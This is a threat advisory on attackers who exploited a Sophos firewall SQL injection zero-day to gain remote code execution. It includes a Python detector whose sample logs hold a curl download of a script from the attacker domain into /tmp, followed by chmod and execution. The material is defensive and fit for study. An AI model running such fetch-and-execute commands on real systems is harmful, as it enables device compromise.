Severity
High
Analysis Summary
Unknown threat actors have exploited a previously unknown SQL injection vulnerability in Sophos firewall products, leading to remote code execution on some of those products. Sophos has already provided its customers with a hotfix that protects them against this attack.
How the Attack Happened
The infection process started when an attacker discovered and exploited a zero-day SQL injection vulnerability that led to remote code execution. Exploiting this vulnerability allowed the attacker to insert a one-line command into a database table.
This initial injected command triggered an affected device to download a Linux shell script named Install.sh from a remote server on the malicious domain sophosfirewallupdate[.]com. The command also wrote this shell script to the /tmp directory on the device, used the chmod program to designate the file as executable, and executed it.
The script (written to the appliance as x.sh) ran a series of SQL commands and dropped additional files into the virtual file system to lay the groundwork for the rest of the attack.
The Install.sh script first ran a number of PostgreSQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself.
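The download, chmod and execute sequence described above is a pattern a defender can look for in command audit records. The following Python script is an added example, not part of the Rewterz advisory or of Sophos's own analysis: it runs a small stateful detector over constructed audit lines (the one-command-per-line format is an assumption) and rates a match higher when the download domain is one of the URL indicators listed in this advisory.

```python
import re

# Constructed sample of command-line audit records (one command per line).
# These are illustrative only and are not real appliance logs.
SAMPLE_AUDIT = """\
curl -sk -o /tmp/x.sh https://sophosfirewallupdate.com/sp/Install.sh
chmod +x /tmp/x.sh
/tmp/x.sh
wget -O /tmp/update.sh https://downloads.example.org/legit.sh
sh /tmp/update.sh
wget -O /tmp/y.sh https://downloads.example.org/other.sh
/tmp/y.sh
"""

# Domains taken from the advisory's URL indicators.
SUSPECT_DOMAINS = {
    "sophosfirewallupdate.com",
    "ragnarokfromasgard.com",
    "filedownloaderservers.com",
}

# curl/wget with an explicit output path; chmod +x or an octal mode with an
# execute bit; direct or interpreter-driven execution of a file under /tmp.
DOWNLOAD_RE = re.compile(r"^(?:curl|wget)\b.*?\s-[oO]\s+(\S+).*?https?://([^/\s]+)")
CHMOD_RE = re.compile(r"^chmod\s+(?:\+x|[0-7]*[1357][0-7]*)\s+(\S+)")
EXEC_RE = re.compile(r"^(?:(sh|bash)\s+)?(/tmp/\S+)")


def detect_stager_chain(audit_text):
    """Return (path, domain, severity) for every /tmp script that was
    downloaded and later executed. Direct execution only counts once a
    chmod has made the file executable; 'sh /tmp/x' needs no chmod."""
    state = {}      # path -> {"domain": str, "chmod": bool}
    findings = []
    for line in audit_text.splitlines():
        line = line.strip()
        m = DOWNLOAD_RE.match(line)
        if m:
            state[m.group(1)] = {"domain": m.group(2).lower(), "chmod": False}
            continue
        m = CHMOD_RE.match(line)
        if m and m.group(1) in state:
            state[m.group(1)]["chmod"] = True
            continue
        m = EXEC_RE.match(line)
        if m and m.group(2) in state:
            rec = state[m.group(2)]
            if m.group(1) is not None or rec["chmod"]:
                severity = "high" if rec["domain"] in SUSPECT_DOMAINS else "medium"
                findings.append((m.group(2), rec["domain"], severity))
    return findings
```

Running `detect_stager_chain(SAMPLE_AUDIT)` flags x.sh as high (suspect domain) and update.sh as medium (unknown domain, same behaviour), while y.sh is not reported because it was never made executable before the direct execution attempt.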
Impact
- SQL injection
- Remote code execution
- Data exfiltration
Affected Vendors
Sophos
Indicators of Compromise
SHA-256
URL
Remediation
A hotfix is available for customers to patch the vulnerability. Customers who do not have automatic updates enabled can follow the instructions here.